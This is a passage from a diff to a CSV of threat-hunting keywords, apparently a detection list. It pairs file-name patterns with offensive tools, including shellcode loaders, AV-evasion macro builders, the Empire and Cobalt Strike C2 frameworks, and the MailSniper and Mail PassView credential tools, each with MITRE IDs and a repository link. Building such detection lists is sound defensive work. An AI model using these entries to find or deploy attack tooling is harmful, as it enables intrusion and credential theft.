 "*Macrome.csproj*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z"
 "*Macrome.dll*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z"
 "*Macrome.sln*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z"
-"*MACshellcode.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
-"*MACshellcode.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
-"*MACshellcode.sln*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
-"*MACshellcode.vcxproj*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
+"*MACshellcode.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
+"*MACshellcode.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
+"*MACshellcode.sln*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
+"*MACshellcode.vcxproj*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
"*magicRasMan*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*Magnitude Exploit Kit*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*mailpv.exe*","offensive_tool_keyword","mailpv","Mail PassView is a small password-recovery tool that reveals the passwords and other account details in email clients","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/mailpv.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*mailpv.zip*","offensive_tool_keyword","mailpv","Mail PassView is a small password-recovery tool that reveals the passwords and other account details in email clients","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/mailpv.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*MailSniper*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc...). It can be used as a non-administrative user to search their own email. or by an Exchange administrator to search the mailboxes of every user in a domain","T1083 - T1114 - T1003","TA0003 - TA0007 - TA0040","N/A","N/A","Information Gathering","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*MailSniper.ps1*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*MailSniper*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. 
network architecture information. etc...). It can be used as a non-administrative user to search their own email. or by an Exchange administrator to search the mailboxes of every user in a domain","T1083 - T1114 - T1003","TA0003 - TA0007 - TA0040","N/A","N/A","Information Gathering","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*MailSniper.ps1*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*main/gcr.py*","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","1","N/A","10","10","78","15","2023-06-26T09:04:02Z","2023-06-18T13:23:31Z" "*main_air_service-probes.go*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - 
T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*main_pro_service-probes.go*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*make_avet -l *.exe 
*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*make_avetsvc *","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*make_kernel_shellcode*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*make_kernel_user_payload*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*make_smb1_anonymous_login_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*make_smb1_echo_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*make_smb1_free_hole_session_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*make_smb1_nt_trans_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*make_smb1_trans2_explo*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*make_smb2_payload_body_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*make_smb2_payload_headers_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_kernel_shellcode*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
